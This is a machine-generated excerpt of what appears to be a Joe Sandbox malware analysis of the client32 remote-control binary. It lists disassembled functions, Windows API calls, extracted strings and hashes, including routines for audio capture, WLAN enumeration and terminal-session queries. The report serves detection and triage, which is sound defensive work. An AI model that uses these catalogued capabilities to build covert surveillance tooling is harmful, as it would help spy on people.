                                                                                • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                              • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,EE49F673,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                              • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                              • _calloc.LIBCMT ref: 1100B519
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                              • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                              • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                              Strings
                                                                              • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                              • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                              • DisableSounds, xrefs: 1100B472
                                                                              • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                              • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                              • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                              • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                              • Audio, xrefs: 1100B477
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                              • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                              • API String ID: 1843377891-2362500394
                                                                              • Opcode ID: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                              • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                              • Opcode Fuzzy Hash: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                              • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                              Function 1102B920 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                              • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                              • _fgets.LIBCMT ref: 1102BB10
                                                                              • _strtok.LIBCMT ref: 1102BB38
                                                                                • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                              • _fgets.LIBCMT ref: 1102BB74
                                                                              • _strtok.LIBCMT ref: 1102BB88
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                              • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 78526175-1484737611
                                                                              • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                              • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                              • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                              • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                              Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
                                                                              • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                              • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                              • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                              • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                              • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                              • std::exception::exception.LIBCMT ref: 1115B68D
                                                                              • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                              • API String ID: 2439742961-1736626566
                                                                              • Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                              • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                              • Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                              • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                              Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                              • _free.LIBCMT ref: 1112131D
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 11121333
                                                                              • _free.LIBCMT ref: 11121348
                                                                              • GdiFlush.GDI32(?,?,?,02CD8E40), ref: 11121350
                                                                              • _free.LIBCMT ref: 1112135D
                                                                              • _free.LIBCMT ref: 11121371
                                                                              • SelectObject.GDI32(?,?), ref: 1112138D
                                                                              • DeleteObject.GDI32(?), ref: 1112139A
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,02CD8E40), ref: 111213A4
                                                                              • DeleteDC.GDI32(?), ref: 111213CB
                                                                              • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                              • DeleteDC.GDI32(?), ref: 111213EB
                                                                              • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                              Strings
                                                                              • Error deleting membm, e=%d, xrefs: 111213AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                              • String ID: Error deleting membm, e=%d
                                                                              • API String ID: 3195047866-709490903
                                                                              • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                              • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                              • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                              • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                              Function 110537C0 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 360COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,EE49F673,?,?), ref: 11041F52
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                              • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                              • API String ID: 3701541597-1781216912
                                                                              • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                              • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                              • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                              • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                              Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                              • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                              • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                              • API String ID: 4172769820-2231854162
                                                                              • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                              • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                              • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                              • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                              Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000017D,EE49F673,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                              • _memset.LIBCMT ref: 1110F4C2
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                              • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                              • _free.LIBCMT ref: 1110F628
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                              • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                              • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,EE49F673,0000017D,00000001), ref: 1110F681
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                              • String ID: End Record %s$PCIR
                                                                              • API String ID: 4278564793-2672865668
                                                                              • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                              • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                              Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,EE49F673,1102E747,?,00000000), ref: 110F711B
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                              • wsprintfA.USER32 ref: 110F7235
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                              • wsprintfA.USER32 ref: 110F7267
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                              • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                              • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 856016564-3838485836
                                                                              • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                              • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                              Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                              • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                              • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                              • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                              • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                              • GetDC.USER32(?), ref: 11025085
                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                              • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                              • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                              • SelectObject.GDI32(?,?), ref: 110250C7
                                                                              • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SetCaretPos.USER32(?,?), ref: 11025111
                                                                              Strings
